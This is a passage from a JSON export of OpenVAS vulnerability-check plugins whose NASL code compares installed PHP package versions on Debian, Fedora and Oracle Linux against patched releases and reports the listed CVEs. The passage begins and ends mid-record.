ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.4.41-0+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n# On the final stretch release this package has version 1.10.1+submodules+notgz-9 which causes a false positive\n#if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n# report += res;\n#}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-phpdbg\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-readline\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.6.9+dfsg-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-phpdbg\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-readline\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.6.9+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:51:17", "references": ["https://lists.fedoraproject.org/pipermail/package-announce/2015-May/159031.html", "2015-8370"], "pluginID": "1361412562310869423", "description": "Check the version of php", "edition": 4, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-06-09T00:00:00", "title": "Fedora Update for php FEDORA-2015-8370", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-7243", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2013-6420", "CVE-2014-0185"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:1361412562310869423", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869423", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2015-8370\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869423\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-09 10:54:55 +0200 (Tue, 09 Jun 2015)\");\n script_cve_id(\"CVE-2006-7243\", \"CVE-2014-0185\", \"CVE-2013-6420\", \"CVE-2015-4025\",\n \"CVE-2015-4021\", \"CVE-2015-4026\", \"CVE-2015-4024\", \"CVE-2015-4022\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for php FEDORA-2015-8370\");\n script_tag(name: \"summary\", value: \"Check the version of php\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"PHP is an HTML-embedded scripting language.\nPHP attempts to make it easy for developers to write dynamically generated web\npages. PHP also offers built-in database integration for several commercial and\nnon-commercial database management systems, so writing a database-enabled webpage\nwith PHP is fairly simple. The most common use of PHP coding is probably as a\nreplacement for CGI scripts.\n\nThe php package contains the module (often referred to as mod_php) which adds\nsupport for the PHP language to Apache HTTP Server.\n\");\n script_tag(name: \"affected\", value: \"php on Fedora 20\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-8370\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-May/159031.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.5.25~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-28T18:22:36", "references": ["http://linux.oracle.com/errata/ELSA-2015-1219.html"], "pluginID": "1361412562310122867", "description": "Oracle Linux Local Security Checks ELSA-2015-1219", "edition": 5, "reporter": "Eero Volotinen", "published": "2016-02-05T00:00:00", "title": "Oracle Linux Local Check: ELSA-2015-1219", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4644", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-4598", "CVE-2015-4643"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122867", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122867", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1219.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122867\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2016-02-05 14:01:36 +0200 (Fri, 05 Feb 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1219\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1219 - php54-php security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1219\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1219.html\");\n script_cve_id(\"CVE-2015-4643\", \"CVE-2015-4644\", \"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4024\", \"CVE-2015-4025\", \"CVE-2015-4026\", \"CVE-2015-4598\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"php54-php\", rpm:\"php54-php~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-bcmath\", rpm:\"php54-php-bcmath~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-cli\", rpm:\"php54-php-cli~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-common\", rpm:\"php54-php-common~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-dba\", rpm:\"php54-php-dba~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-devel\", rpm:\"php54-php-devel~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-enchant\", rpm:\"php54-php-enchant~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-fpm\", rpm:\"php54-php-fpm~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-gd\", rpm:\"php54-php-gd~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-intl\", rpm:\"php54-php-intl~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-ldap\", rpm:\"php54-php-ldap~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-mbstring\", rpm:\"php54-php-mbstring~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-mysqlnd\", rpm:\"php54-php-mysqlnd~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-odbc\", rpm:\"php54-php-odbc~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-pdo\", rpm:\"php54-php-pdo~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-pgsql\", rpm:\"php54-php-pgsql~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-process\", rpm:\"php54-php-process~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-pspell\", rpm:\"php54-php-pspell~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-recode\", rpm:\"php54-php-recode~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-snmp\", rpm:\"php54-php-snmp~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-soap\", rpm:\"php54-php-soap~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-xml\", rpm:\"php54-php-xml~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-xmlrpc\", rpm:\"php54-php-xmlrpc~5.4.40~3.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"php54-php\", rpm:\"php54-php~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-bcmath\", rpm:\"php54-php-bcmath~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-cli\", rpm:\"php54-php-cli~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-common\", rpm:\"php54-php-common~5.4.40~3.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php54-php-dba\", 